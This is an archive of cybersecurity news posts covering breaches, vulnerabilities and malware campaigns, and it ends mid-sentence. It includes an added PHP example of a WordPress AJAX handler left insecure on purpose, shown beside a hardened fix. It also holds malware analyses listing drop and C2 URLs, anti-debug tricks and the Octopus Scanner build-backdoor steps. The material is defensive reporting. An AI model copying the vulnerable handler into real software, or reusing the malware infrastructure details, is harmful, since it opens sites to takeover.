Category Archives: Pierluigi Paganini

VMware addresses Fusion flaw introduced in the attempt to fix CVE-2020-3950 issue

VMware has released an update to address a privilege escalation flaw in the macOS version of Fusion that was introduced by a previous patch.

In March, VMware patched a high-severity privilege escalation vulnerability (CVE-2020-3950) in Fusion, Remote Console (VMRC) and Horizon Client for Mac.

CVE-2020-3950 is a privilege escalation vulnerability caused by the improper use of setuid binaries; it could be exploited by attackers to escalate privileges to root.

The flaw was reported by Jeffball of GRIMM and Rich Mirch; VMware assigned it a CVSSv3 base score of 7.3 and rated it Important severity. The issue impacts the macOS apps Fusion (11.x before 11.5.2), Remote Console for Mac (11.x and prior before 11.0.1) and Horizon Client for Mac (5.x and prior before 5.4.0).

Mirch and Jeffball immediately noted that the patch issued by VMware was incomplete; VMware confirmed it a few days later and released a new patch at the end of March. Unfortunately, the new fix introduced a new security issue.

The vulnerability introduced by the second patch, tracked as CVE-2020-3957, is a time-of-check time-of-use (TOCTOU) issue that could allow attackers with low permissions to execute arbitrary code with root privileges.

Last week, the company released version 11.5.5, but the fixes for VMRC and Horizon Client for Mac have yet to be approved.

Pierluigi Paganini

(SecurityAffairs – Fusion, cybersecurity)

The post VMware addresses Fusion flaw introduced in the attempt to fix CVE-2020-3950 issue appeared first on Security Affairs.

The team behind the Joomla CMS discloses a data breach

Maintainers at the Joomla open-source content management system (CMS) announced a security breach that took place last week.

Last week a member of the Joomla Resources Directory (JRD) team left an unencrypted full backup of the JRD site (resources.joomla.org) on an unsecured Amazon Web Services S3 bucket operated by the company.

The company did not reveal whether third parties found and accessed the S3 bucket.

“JRD full site backups (unencrypted) were stored in a third-party company Amazon Web Services S3 bucket. The third-party company is owned by a former Team Leader, still Member of the JRD team at the time of the breach.” reads the data breach notification. “Known to the current Team Leader at the time of the breach. (https://volunteers.joomla.org/teams/resource-directory-team) Each backup copy included a full copy of the website, including all the data.”

The backup contained details for approximately 2,700 users who registered and created profiles on the JRD website.

The Joomla Resources Directory portal allows professionals and developers to advertise their services.

The Joomla team said it is still investigating the incident. It is currently unclear if anyone found and downloaded the data from the third-party company’s S3 server.

The Joomla team also carried out a full security audit of the portal.

“The audit also highlighted the presence of Super User accounts owned by individuals outside Open Source Matters,” continues the notification.

Data contained in the backup includes:

  • Full name
  • Business address
  • Business email address
  • Business phone number
  • Company URL
  • Nature of business
  • Encrypted password (hashed)
  • IP address
  • Newsletter subscription preferences

The data breach notification states that most of the data was public because it was a public directory; however, private data (unpublished and unapproved listings, tickets) was also exposed in the breach.

The Joomla team is urging JRD users to change their password on the JRD portal and on any other sites where they reuse the same login credentials.

“Even if we don’t have any evidence about data access, we highly recommend people who have an account on the Joomla Resources Directory and use the same password (or combination of email address and password) on other services to immediately change their password for security reasons.” concludes the notification.

Pierluigi Paganini

(SecurityAffairs – data breach, hacking)


KingNull leaks DB of Daniel’s Hosting dark web hosting provider

Earlier this year a hacker breached Daniel’s Hosting, the largest free web hosting provider for dark web hidden services and now leaked its DB.

A threat actor has leaked the database of Daniel’s Hosting (DH), the largest free web hosting provider for dark web hidden services.

The hacker stole the data in March when he breached the hosting provider; almost 7,600 dark web portals were taken offline following the security breach.

Daniel Winzen, the German software developer who operated the service, revealed that attackers accessed the backend of the hosting provider and deleted all the databases of the websites hosted by Daniel’s Hosting.

Winzen definitively shut down the service on March 26.

Today ZDNet reported that a hacker that goes online with the moniker ‘KingNull’ uploaded a copy of Daniel’s Hosting database on a file-hosting site.

“According to a cursory analysis of today’s data dump, the leaked data includes 3,671 email addresses, 7,205 account passwords, and 8,580 private keys for .onion (dark web) domains.” reported ZDNet.

Threat intelligence firm Under the Breach that analyzed the leaked database told ZDNet that the archive includes sensitive information on the owners and users of thousands of darknet sites. IP addresses of administrators and users were not included in the archive.

The database could allow law enforcement agencies to deanonymize administrators of dark web services that were involved in illegal activities.

Unfortunately, the leak could put in danger activists and dissidents that use the darknets to avoid the censorship applied by regimes.

In November 2018, Daniel’s Hosting was the victim of another incident: attackers hacked the service and deleted 6,500+ sites.

ZDNet revealed that Winzen plans to relaunch the hosting service in several months.

Pierluigi Paganini

(SecurityAffairs – dark web, hacking)


Anonymous demands justice for George Floyd and threatens attacks

The hacktivist collective group Anonymous demands justice for George Floyd and threatens to ‘expose the many crimes’ of Minneapolis Police.

Anonymous demands justice for George Floyd and threatens to ‘expose the many crimes’ of Minneapolis Police. George Floyd was killed by a white police officer who knelt on his neck for more than eight minutes.

While widespread civil unrest escalated in the US and protests against police brutality spread across the country’s major cities, Anonymous released a video threatening the Minneapolis Police Department (MPD) that it will “expose your many crimes to the world.”

The video was shared on May 28 through a Facebook page affiliated with the group; the electronic voice accuses MPD of having “a horrific track record of violence and corruption,” claiming that the killing of George Floyd was “merely the tip of the iceberg.”

“Officers who kill people and commit other crimes need to be held accountable just like the rest of us. Otherwise, they will believe that they have a license to do whatever they want.” the Anonymous narrator says.

“People have had enough of this corruption and violence from an organization that promises to keep them safe. After the events of the past few years, many people are beginning to learn that you are not here to save us but rather you are here to oppress us and carry out the will of the criminal ruling class.”

“You are here to keep order for the people in control, not to provide safety for the people who are controlled. In fact, you are the very mechanism that elites use to continue their global system of oppression.”

“These officers must face criminal charges and officer Chauvin especially should face murder charges. Unfortunately, we do not trust your corrupt organization to carry out justice so will be exposing your many crimes to the world. We are legion. Expect us.”

“Sadly, in the vast majority of police killings, the only one left alive to tell the story is the officer who took the person’s life,” the Anonymous narrator continues. “This travesty has gone on for far too long… and now the people have had enough.”

The collective has launched its offensive against the authorities: the MPD’s website was taken offline late on Saturday, and today alleged members of the group (@PowerfulArmyGR, @namatikure) announced on Pastebin that the site had been hacked and leaked a database of emails and passwords.

“The Minneapolis official website has been hacked and the database with emails and passwords leaked.” reads the post published on Pastebin.

Anonymous has yet to claim responsibility for taking down the website.

In the last hours other operations have been attributed to Anonymous, including the hack of Chicago police radios,

Pierluigi Paganini

(SecurityAffairs – George Floyd, Anonymous)


ENISA published “Proactive detection – Measures and information sources” report

The EU Agency for Cybersecurity ENISA has published a new report on the proactive detection of incidents, including measures and information sources.

The EU Agency for Cybersecurity ENISA has published a new report and accompanying repository on measures and information sources that could help security experts and operators of IT and critical infrastructure to proactively detect network security incidents in the EU.

The document aims to evaluate methods, tools, activities and information sources for the proactive detection of network security incidents.

The proactive detection process aims to discover malicious activity conducted by threat actors through internal monitoring tools or external sources that share information about detected incidents.

“The current project aims to provide a complete inventory of all available methods, tools, activities and information sources for proactive detection of network security incidents, which are used already or potentially could be used by incident response teams in Europe nowadays.” reads the report. “The current report evaluates available methods, tools, activities and information sources for proactive detection of network incidents.”

ENISA proactive detection security incidents

The EU agency launched this project to improve the detection of network security incidents in the EU, by:

  • Providing an inventory of available measures and information sources;
  • Identifying good practices;
  • Recommending possible areas for development.

This report identifies and analyzes how proactive detection in the EU has evolved between 2011 and 2019. Among the goals of the project is the exploration of new areas that could help improve operational cooperation and information sharing.

The deliverables of the project are three reports and a living repository hosted on GitHub.

“The objective is to offer a point of reference for new or well-established teams who need to identify or reassess appropriate measures for proactive detection of incidents.” continues the post published by ENISA.

1- Report – Survey results

  • Survey among incident response teams in Europe;
  • Comparison with the 2011 survey.

2- Report – Measures and information sources

  • Inventory of available methods, tools, activities and information sources;
  • Evaluation of identified measures and information sources.

3- Report – Good practices gap analysis recommendations

  • Analysis of the data gathered;
  • Recommendations.

4- Online repository – GitHub

  • Information sources;
  • Measures and tools.

Enjoy the report!

Pierluigi Paganini

(SecurityAffairs – ENISA, cybersecurity)


Coronavirus-themed attacks May 24 – May 30, 2020

This post includes the details of the Coronavirus-themed attacks launched from May 24 to May 30, 2020.

Threat actors exploit the interest in the Coronavirus outbreak while infections increase worldwide; experts are observing new campaigns on a daily basis.

Below is a list of attacks detected this week.

May 26 – Hangzhou could permanently adopt COVID-19 contact-tracing app

The City of Hangzhou is planning to make a contact tracing system developed to fight the COVID-19 pandemic permanent for its citizens.

May 27 – Fuckunicorn ransomware targets Italy in COVID-19 lures

A new piece of ransomware dubbed FuckUnicorn is targeting Italy by tricking victims into downloading a fake COVID-19 contact tracing app.

May 29 – Himera and AbSent-Loader Leverage Covid19 lures

Researchers at ZLab spotted a new phishing campaign using Covid19 lures to spread Himera and Absent-Loader.  

May 30 – A new COVID-19-themed campaign targets Italian users

Security researchers uncovered a new COVID-19-themed campaign targeting users of the National Institute for Social Security (INPS).

If you are interested in COVID19-themed attacks from February 1, take a look at the following posts:

Pierluigi Paganini

(SecurityAffairs – COVID-19, Coronavirus themed campaigns)


Over 100K+ WordPress sites using PageLayer plugin exposed to hack

Two security flaws in the PageLayer WordPress plugin can be exploited to potentially wipe the contents or take over WordPress sites.

Security experts from WordFence discovered two high severity security vulnerabilities in the PageLayer WordPress plugin that could potentially allow attackers to wipe the contents or take over WordPress sites using vulnerable plugin versions.

PageLayer is a WordPress page builder plugin; it is very easy to use and has over 200,000 active installations according to the numbers on its WordPress plugins repository entry.

The vulnerabilities were reported to PageLayer’s developer by the Wordfence Threat Intelligence team on April 30 and were patched with the release of version 1.1.2 on May 6.

One vulnerability could allow an authenticated user with subscriber-level and above permissions to update and modify posts.

“One flaw allowed any authenticated user with subscriber-level and above permissions the ability to update and modify posts with malicious content, amongst many other things,” reads the post published by Wordfence.

The second vulnerability could allow attackers to forge a request on behalf of a site’s administrator to change the plugin settings, allowing them to inject malicious JavaScript.

Both vulnerabilities are the result of unprotected AJAX actions, nonce disclosure, and a lack of Cross-Site Request Forgery (CSRF) protection. An attacker could exploit the vulnerabilities to inject malicious JavaScript code, alter the pages of the site, create rogue admin accounts, redirect site visitors to malicious sites, and exploit site users’ browsers to compromise their computers.

WordFence experts reported the issue to PageLayer’s developers on April 30 and both were addressed with the release of version 1.1.2 on May 6.

The developers implemented permission checks on all of the sensitive functions that could be used to change the site and reconfigured the plugin to create separate nonces for the public and administrative areas of a WordPress site.
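As an added illustration of the bug class and the fix described above (example code written for this page, not PageLayer’s or Wordfence’s code), here is a hypothetical page-builder plugin’s AJAX post-update handler in its unprotected shape beside a hardened version; the function names, nonce actions and admin menu slug are assumed.

```php
<?php
/**
 * Added example, not PageLayer's or Wordfence's code. A hypothetical plugin's
 * AJAX handler that updates post content, first in the vulnerable shape the
 * article describes, then hardened. pb_* names, the nonce actions and the
 * admin page hook are made up for this illustration.
 */

/* --- Vulnerable pattern (do not ship) -----------------------------------
 * Reachable by every logged-in user, it checks only a nonce that the plugin
 * also prints into public pages, and never asks whether the caller may edit
 * the post. A subscriber, or a forged cross-site request carrying the
 * disclosed nonce, can overwrite any post with arbitrary HTML/JavaScript.
 */
function pb_save_post_vulnerable() {
    check_ajax_referer( 'pb_public_nonce', 'nonce' );   // same nonce as the front end
    $post_id = (int) $_POST['post_id'];                 // no capability check
    wp_update_post( array(
        'ID'           => $post_id,
        'post_content' => wp_unslash( $_POST['content'] ), // unfiltered content
    ) );
    wp_send_json_success();
}

/* --- Hardened version ---------------------------------------------------
 * 1. A distinct nonce for the administrative area, never echoed on public pages.
 * 2. A capability check bound to the specific post (the edit_post meta capability).
 * 3. Input reduced to the HTML the caller is actually allowed to post.
 */
function pb_save_post_hardened() {
    // Third argument false: do not die, so we can answer with a JSON error.
    if ( ! check_ajax_referer( 'pb_admin_nonce', 'nonce', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid or missing nonce' ), 403 );
    }

    $post_id = isset( $_POST['post_id'] ) ? absint( $_POST['post_id'] ) : 0;

    // Subscribers fail here; authors fail for posts they do not own.
    if ( ! $post_id || ! current_user_can( 'edit_post', $post_id ) ) {
        wp_send_json_error( array( 'message' => 'Not allowed to edit this post' ), 403 );
    }

    $content = isset( $_POST['content'] ) ? wp_unslash( $_POST['content'] ) : '';
    // Strip script tags and other disallowed markup unless the user may post unfiltered HTML.
    if ( ! current_user_can( 'unfiltered_html' ) ) {
        $content = wp_kses_post( $content );
    }

    $result = wp_update_post( array(
        'ID'           => $post_id,
        'post_content' => $content,
    ), true );

    if ( is_wp_error( $result ) ) {
        wp_send_json_error( array( 'message' => $result->get_error_message() ), 500 );
    }
    wp_send_json_success( array( 'post_id' => $post_id ) );
}
add_action( 'wp_ajax_pb_save_post', 'pb_save_post_hardened' );
// Deliberately no wp_ajax_nopriv_ hook: anonymous visitors get nothing.

/* The admin nonce is generated only on the plugin's own admin screen, so it
 * is never disclosed in public HTML where a front-end nonce might live. */
function pb_enqueue_admin_script( $hook ) {
    if ( 'toplevel_page_pb-builder' !== $hook ) {   // assumed menu page hook
        return;
    }
    wp_enqueue_script( 'pb-admin', plugins_url( 'admin.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'pb-admin', 'pbAdmin', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'pb_admin_nonce' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'pb_enqueue_admin_script' );
```

A nonce alone is not an authorization check: it only proves the request originated from a page that printed it, which is exactly why a nonce disclosed on public pages offers no protection, and why the capability check is the part that stops the subscriber-level abuse.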

At the time of writing, more than a hundred thousand WordPress sites still use vulnerable versions of the PageLayer plugin.

When it comes to WordPress attacks involving the exploitation of vulnerabilities, malicious actors usually target unpatched plugins; for this reason, it is essential to keep them up to date.

I believe it is very important to protect WordPress installs with dedicated solutions; I’m currently using the WordFence solution, and the company provided me with a license to evaluate the premium features.

Pierluigi Paganini

(SecurityAffairs – PageLayer, hacking)


A new COVID-19-themed campaign targets Italian users

Security researchers uncovered a new COVID-19-themed campaign targeting users of the National Institute for Social Security (INPS).

Security experts from D3Lab have uncovered a new COVID-19-themed phishing campaign that is targeting the users of the Italian National Institute for Social Security (INPS). Like a previous campaign observed in early April, threat actors set up a fake INPS site (“inps-it[.]top”) to trick victims into downloading a malicious app.

“A new phishing campaign against INPS users, similar to the previous one of April 6, 2020, has been detected in the past few hours by our research and analysis center for phishing campaigns.” reads the post published by D3Lab.

“The fraudulent activity is carried out through a web domain created ad hoc with similarities, in the name, to the official one of the national social security institution, with the intent to download malware to users interested in receiving the Covid-19 allowance allocated by the Italian state.”

COVID-19 campaign INPS

D3Lab reported its findings to the Italian CERT-AGID that published a security advisory.

Cybercriminals are attempting to take advantage of the Covid-19 indemnity that the Italian government will give to some Italian citizens with specific requirements.

Citizens have to request the Covid-19 indemnity from the government through the INPS portal; for this reason, threat actors set up a fake INPS site asking people to download a phantom “application for the new COVID-19 indemnity” which actually returns a malicious APK for Android devices.

The malicious APK, named “acrobatreader.apk,” is Trojan-Banker malware that is able to monitor the actions performed by the user.

The malware asks users to enable the accessibility service in order to abuse the legitimate functions of this service and gain wider access to the system APIs so it can interact with other apps on the device.

“As soon as the presence of connectivity is detected, an HTTP POST request is sent to the C2 through the following url “http://greedyduck[.]top/gate[.]php” passing two parameters:

  • “Action”: with botcheck or injcheck values;
  • “Data”: information collected and passed in encrypted form (RC4).”

The CERT-AGID published the Indicators of Compromise (IoCs) here.

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)


API Security and Hackers: What’s the Need?

API Security – There is considerable demand for data-centric projects, which is why companies have quickly opened their data to their ecosystems through REST or SOAP APIs.

APIs work as the doors of a company, closely guarding an organization’s data. However, this creates a challenge: how do we hold the doors open to the world while simultaneously sealing them off from hackers?

Here are some simple tips for API security; let’s have a look!

Authentication

Don’t communicate with strangers. To make attacking your system harder, always know who is calling your APIs, by using simple access authentication (user/password) or an API key (asymmetric key).

Encryption 

Just be cryptic. For internal or external communication, nothing should be sent in the clear.

You and your partners can encrypt all transfers with TLS (the successor to SSL), be it one-way encryption (also called standard one-way TLS) or, even better, mutual encryption (two-way TLS).

Use the latest versions of TLS to block the use of weaker cipher suites.

Monitoring: Audit, Log, and Version 

In case of an error, you need to be ready to troubleshoot: audit and log relevant information on the server, and keep that history for as long as is reasonable in terms of capacity for your production servers. In case of any incident, your logs become debugging tools. Monitoring dashboards are also highly recommended for tracking your API use.

Do not forget to add a version to all APIs, ideally in the API address, so that several versions of an API can run concurrently and so that one version can be deprecated and removed in favour of another.

Call Security Experts

It is better to use ICAP (Internet Content Adaptation Protocol) servers or good antivirus systems to protect your company’s data.

Share as Little as Possible 

For API security, it’s okay to be paranoid and show very little information, particularly in error messages. Limit content and email subjects to predefined, non-customizable messages. Since IP addresses can reveal locations, keep them to yourself. To limit access to your accounts, use IP whitelists and blacklists where possible. You can also check your own IP address by simply searching for “what is my IP”. Limit the number of administrators, divide access into distinct roles, and hide sensitive information in all your interfaces.

OAuth & OpenID Connect 

Delegate all responsibilities. A good manager takes accountability, and a great API does too. The authorization and/or authentication of your APIs should be delegated.

OAuth is a magical mechanism that saves you from having to remember 10,000 passwords. Instead of creating an account on a website, you can connect via credentials from another provider, such as Facebook or Google. This works the same way for APIs: the API provider relies on a third-party server to handle permissions. The user does not supply their credentials to the API but instead presents a token issued by the third-party server. This protects the user because they don’t reveal their passwords, and the API provider doesn’t need to worry about protecting authorization data, because it only handles tokens.

OAuth is a delegation protocol widely used to forward authorizations. You can add an identity layer on top of it to protect your APIs even further and add authentication: this is the OpenID Connect standard, which extends OAuth 2.0 with ID tokens.

System Protection with Throttling and Quotas 

Keep control. To protect your backend network bandwidth according to the capacity of your servers, you can restrict access to your system to a limited number of messages per second.

You can also limit access per API and per user (or application) to make sure that no one in particular can abuse the program or any API.

Throttling thresholds and quotas, if well defined, are essential to prevent attacks from different sources overwhelming the network with numerous requests (DDoS, Distributed Denial of Service attack).

OWASP top 10

Avoid wasps. The OWASP (Open Web Application Security Project) Top 10 is a list of the ten worst vulnerability classes, measured by their exploitability and impact. In addition to the above, make sure that you have checked your program against all of the OWASP issues.

Data Validation 

Be picky and refuse surprise presents, especially when they’re massive. You should verify everything your server accepts. Be vigilant: reject unexpected added content and data that is too large, and also test the information that customers give you. Use XML or JSON schema validation to verify that inputs are what they should be (integer, string, …) to avoid all kinds of XML bombs and SQL injection.

Infrastructure 

Stay up to date. To be stable and still benefit from the latest security updates, a good API should rely on a secure network, infrastructure and up-to-date software (servers, load balancers).

API Firewalling 

Create a wall: building a wall will solve all the immigration issues for some citizens. That is the case, at least, for APIs! The protection of your API should be divided into two levels:

  • The DMZ is the first level, with an API firewall performing simple protection measures, including checking message size and SQL injections, and any HTTP-layer protection that blocks intruders early. The message is then forwarded to the second level.
  • The second level is the LAN, with advanced data protection mechanisms.

Set a Budget for Security Testing 

Security testing takes time and resources, and the investment needs to be made by businesses. Although new functionality drives growth, security testing should be allocated about 5 percent to 10 percent of the budget. Use of APIs is growing and encouraging companies to create more diverse applications. Nonetheless, as they exploit these resources, companies need to be mindful of and close possible security holes.

About the author: Waqas Baig

Waqas Baig is a Tech Writer with 8 years of experience in journalism, reporting and editing. In his spare time, he reads and writes about tech products including gadgets, smart watches, home security products and others. If you have story ideas, feel free to share them at waqasbaigblog@gmail.com

Pierluigi Paganini

(SecurityAffairs – APT, hacking)


ICT solutions provider NTT Com discloses security breach

NTT Communications (NTT Com), a subsidiary of tech giant NTT Corp, disclosed a data breach that impacted hundreds of customers.

NTT Communications (NTT Com), a subsidiary of the tech giant NTT Corp, disclosed a data breach that impacted hundreds of customers.

NTT Com provides network management, security and solution services to consumers, corporations and governments.

NTT Com Group has more than 30 companies in the Asia-Pacific region, Europe and the Americas.

The company launched an investigation after discovering unauthorized access to some systems on May 7; this week it confirmed that threat actors may have stolen data.

“NTT Communications (hereafter NTT Com) detected an unauthorized access to our equipment that has been made by an attacker on May 7, and the possibility that some information may have leaked to the outside was confirmed on May 11.” reads the data breach notification.

Experts at NTT Com initially noticed suspicious activity on an Active Directory server, then discovered that threat actors had breached an operational server and an information management server that stored customer information.

The internal investigation revealed that attackers initially targeted a server in Singapore, then used it for lateral movement to reach the infrastructure in Japan.

In response to the incident, the company shut down the impacted servers to prevent the malware from spreading and communicating with external servers.

According to NTT, the security breach could impact 621 companies whose information was stored on the information management server.

The company announced that it has taken additional measures to prevent similar attacks in the future.

Other major Japanese companies recently disclosed security breaches, some of which took place years ago, including NEC, Mitsubishi Electric, Pasco and Kobe Steel.

Pierluigi Paganini

(SecurityAffairs – NTT, hacking)


Himera and AbSent-Loader Leverage Covid19 Themes

Researchers at ZLab spotted a new phishing campaign using Covid19 lures to spread Himera and Absent-Loader.  

Introduction

During our Cyber Defense monitoring activities we intercepted waves of incoming emails directed at many companies under our protective umbrella. These messages leveraged FMLA (Family and Medical Leave Act) requests related to the ongoing COVID19 pandemic. The emails were weaponized with two versatile cyber-criminal tools: Himera and Absent-Loader.

Figure 1: Email vector example

Loaders are a type of malicious code specialized in loading additional malware onto the victim’s machine. Sometimes a loader also takes on “stealer” behavior, opportunistically gathering sensitive information even though that is not its main purpose; Absent-Loader, despite its name, behaves this way. In fact, the stolen-information market is definitely remunerative for cyber criminals: information gathered from infected systems is constantly sold in the underground, typically acquired by other, more structured criminal organizations or even by business competitors.

Technical Analysis  

The sample used in this campaign first uses a Word document that refers to an executable; that executable then drops another executable and performs renaming operations to evade controls. The following picture shows the infection chain used in this campaign:

Figure 2: Infection Chain

The malicious email wave contained a .doc attachment. The static information of this file follows:

Name: Covid-19-PESANTATION.doc
Hash: 97FA1F66BD2B2F8A34AAFE5A374996F8
Threat: Himera Loader dropper
Size: 95,4 KB (97.745 byte)
Filetype: Microsoft Word document
Ssdeep: 1536:7fVmPSiRO8cOV8xCcoHrZvIdTZ2DSXMqcI3iL5PEs8VlbeH0btGDYLlNq2l+SEg:7fVz8zyUHlvId7H3iL5MVlbeHGkQvqTU

Table 1: Static information about the Malicious document

The interesting feature of this document is that it does not leverage any macro or exploit; instead it contains the entire executable as an embedded object. The user is led to double-click the malicious icon representing the executable.

Thus, once clicked, the malicious document executes a malicious file named HimeraLoader.exe.

Name: HimeraLoader.exe
Hash: 4620C79333CE19E62EFD2ADC5173B99A
Threat: Second stage dropper
Size: 143 KB (146.944 byte)
Filetype: Executable
File Info: Microsoft Visual C++ 8
Ssdeep: 3072:jqW9iAayyenylzx0/2gJUSUZsnOA/TtYLeEoWj5PxJhQQeSH1pNGmHohurCMSiBf:jqW9iAayyenylzx0/2gJUSUZsnJ/TKLd

Table 2: Static information about the HimeraLoader executable

Inspecting the HimeraLoader.exe trace, we noticed a really characteristic mutex created during the initial loading of the malicious code: the “HimeraLoader v1.6” mutex, or Mutant.

Figure 3: Himera Loader Mutex

Also, the sample performs some classic anti-analysis tricks using Windows APIs such as “IsDebuggerPresent”, “IsProcessorFeaturePresent” and “GetStartupInfoW”. Execution takes a different path in the program’s flow if a debugger is present. The function GetStartupInfoW retrieves the contents of the STARTUPINFO structure that was specified when the calling process was created. It takes as parameter a pointer to a STARTUPINFO structure that receives the startup information and does not return a value.

Figure 4: Relevant strings of the Loader

When the Himera Loader goes through its execution and passes all its anti-analysis tricks, it fetches another binary from http:]//195.]2.]92.]151/ad/da/drop/smss.]exe . The remote server is operated by Hosting Technologies LLC, a company running the Russian hosting service brand “VDSina.ru”.

The AbSent-Loader 

The file downloaded from the drop URL has the following static information:

Name: smss[1].exe
Hash: 4D2207059FE853399C8F2140E63C58E3
Threat: Dropper/Injector
Size: 0,99 MB (1.047.040 byte)
Filetype: Executable
File Info: Microsoft Visual C++ 8
Ssdeep: 24576:+9d+UObalbls+rcaN+cFsyQIDHx2JrjDwc9bmfRiHwl:+9d+UObaVzrcaN+cKypDHx2Jr/wYbmJd

Table 3: Static information about the AbsentLoader Payload

When “smss.exe” is executed, it copies itself to a new file, winsvchost.exe, in the %TEMP% path and creates a scheduled task to maintain persistence after reboot.

Figure 5: Evidence of the Scheduled Task

Moreover, the malware adopts some interesting anti-debug techniques, like the GetTickCount one. The technique is quite similar to the one described in one of our previous reports: the two GetTickCount values are subtracted and the difference is placed in the EAX register. After the “call eax” instruction, the result of the first GetTickCount API call is immediately subtracted from that of the second one.

Figure 6: GetTickCount anti-debug Technique

Then, the malware establishes a TCP connection every 15 minutes. These connections are directed to the same remote host operated by Hosting Technologies LLC (195.2.92.151), but this time it sends HTTP POST requests to the “/ad/da/gate.php” resource.

Figure 7: Evidence of some relevant strings inside the payload

This payload is a new version of AbSent-Loader, a piece of malware that, despite its name, also behaves like a bot: it lacks most modern advanced features but is sophisticated enough to maintain persistence on the victim host and to escalate the attack with follow-up malware implants.
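The fixed 15-minute POST cadence to /ad/da/gate.php is the kind of pattern a proxy log review can surface. The detector below is an added example, not code from the ZLab report; it assumes a generic proxy log layout ("timestamp src_ip method url status") and runs over constructed log lines that reuse the host and path reported above.

```python
"""Beacon detector for the AbSent-Loader check-in pattern described above.

Added example, not code from the original report. It groups outbound HTTP
POSTs by (source, host, path) and flags destinations contacted at a regular
interval close to the reported 15-minute check-in period.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev
from urllib.parse import urlsplit

# Constructed sample log (assumed layout: "<ISO ts> <src_ip> <method> <url> <status>").
# 10.0.0.12 checks in to gate.php every ~15 minutes; 10.0.0.7 posts to a
# login form at irregular intervals and must not be flagged.
SAMPLE_LOG = """\
2020-05-27T10:00:02 10.0.0.12 POST http://195.2.92.151/ad/da/gate.php 200
2020-05-27T10:03:10 10.0.0.12 GET http://example.org/index.html 200
2020-05-27T10:15:05 10.0.0.12 POST http://195.2.92.151/ad/da/gate.php 200
2020-05-27T10:22:41 10.0.0.12 GET http://example.org/news 200
2020-05-27T10:30:01 10.0.0.12 POST http://195.2.92.151/ad/da/gate.php 200
2020-05-27T10:45:04 10.0.0.12 POST http://195.2.92.151/ad/da/gate.php 200
2020-05-27T11:00:03 10.0.0.12 POST http://195.2.92.151/ad/da/gate.php 200
2020-05-27T10:01:00 10.0.0.7 POST http://example.org/login 302
2020-05-27T10:31:00 10.0.0.7 POST http://example.org/login 302
2020-05-27T10:44:00 10.0.0.7 POST http://example.org/login 302
2020-05-27T10:50:00 10.0.0.7 POST http://example.org/login 302
"""


def parse_log(text):
    """Yield (timestamp, src, method, host, path) tuples from the log text."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, method, url, _status = line.split()
        parts = urlsplit(url)
        yield datetime.fromisoformat(ts), src, method, parts.hostname, parts.path


def find_beacons(text, expected_minutes=15.0, tolerance=0.15, min_hits=4):
    """Return {(src, host, path): mean_interval_seconds} for POST endpoints
    contacted at least `min_hits` times at a cadence whose jitter and whose
    distance from `expected_minutes` are both within `tolerance` (fraction)."""
    timeline = defaultdict(list)
    for ts, src, method, host, path in parse_log(text):
        if method == "POST":
            timeline[(src, host, path)].append(ts)

    expected = expected_minutes * 60
    hits = {}
    for key, stamps in timeline.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        # Low relative jitter = machine-driven timer, not a human browsing.
        jitter = pstdev(gaps) / avg if avg else float("inf")
        if jitter <= tolerance and abs(avg - expected) <= tolerance * expected:
            hits[key] = avg
    return hits


if __name__ == "__main__":
    for (src, host, path), avg in find_beacons(SAMPLE_LOG).items():
        print(f"beacon: {src} -> {host}{path} every {avg / 60:.1f} min")
```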

Conclusion

The attack we intercepted and described here is a clear example of the new threats that are approaching cyberspace during these months: new criminal threat actors with the sole objective to economically exploit the emotional reactions of the people willing to keep the economic fabric alive and running to support the Covid19 response.

In this particular period, cyberspace is getting more and more risky for companies and people: cybercrime rose during the lockdowns, and these malicious actors are using every possible medium to make more money at the expense of companies and organizations. For this reason, we strongly advise companies to adapt and enhance their cyber security perimeter to resist the new volumes and types of cyber attacks we are experiencing these days.

Indicators of Compromise (IoCs) and Yara rules are available here:

Pierluigi Paganini

(SecurityAffairs – COVID19, hacking)

The post Himera and AbSent-Loader Leverage Covid19 Themes appeared first on Security Affairs.

Octopus Scanner Malware: open source supply chain attack via NetBeans projects on GitHub

GitHub has issued a security alert warning of a malware campaign that is spreading on its platform via boobytrapped NetBeans Java projects.

GitHub has issued a security alert warning of a piece of malware dubbed Octopus Scanner that is spreading on its platform via boobytrapped NetBeans Java projects.

GitHub’s security team discovered the malicious code in projects managed using the Apache NetBeans IDE (integrated development environment), a complete environment composed of editors, wizards, and templates that help users to create applications in Java, PHP and many other languages.

On March 9, a security researcher informed GitHub about a set of GitHub-hosted repositories that were actively serving malware. The company immediately investigated the incident and discovered malware designed to enumerate and backdoor NetBeans projects, “and which uses the build process and its resulting artifacts to spread itself.”

What makes this case different from previous abuses of the platform is that the owners of the repositories were unaware that they were committing backdoored code into their repositories.

“GitHub’s Security Incident Response Team (SIRT) received its initial notification about a set of repositories serving malware-infected open source projects from security researcher JJ.” reads a post published by GitHub.

“This report was different. The owners of the repositories were completely unaware that they were committing backdoored code into their repositories.”

The Octopus Scanner identifies the NetBeans project files and embeds malicious payload both in project files and build JAR files.

Below is a high-level description of the Octopus Scanner activity:

  • Identify user’s NetBeans directory
  • Enumerate all projects in the NetBeans directory
  • Copy malicious payload cache.dat to nbproject/cache.dat
  • Modify the nbproject/build-impl.xml file to make sure the malicious payload is executed every time the NetBeans project is built
  • If the malicious payload is an instance of the Octopus Scanner itself the newly built JAR file is also infected.

Experts uncovered 26 open source projects that were backdoored by the Octopus Scanner malware and that were serving backdoored code.

The Octopus Scanner campaign is not recent; it has been going on for years. Experts reported that the oldest sample of the malware was uploaded to VirusTotal in August 2018.

Upon downloading any of the 26 projects, the malware would infect users’ local computers. The malware scans the victim’s workstation for a local NetBeans IDE install and attempts to backdoor other developers’ Java projects.

According to the experts, Octopus Scanner is a multiplatform malware, it runs on Windows, macOS, and Linux and downloads a remote access trojan (RAT).

“However, if it was found, the malware would proceed to backdoor NetBeans project builds through the following mechanisms:

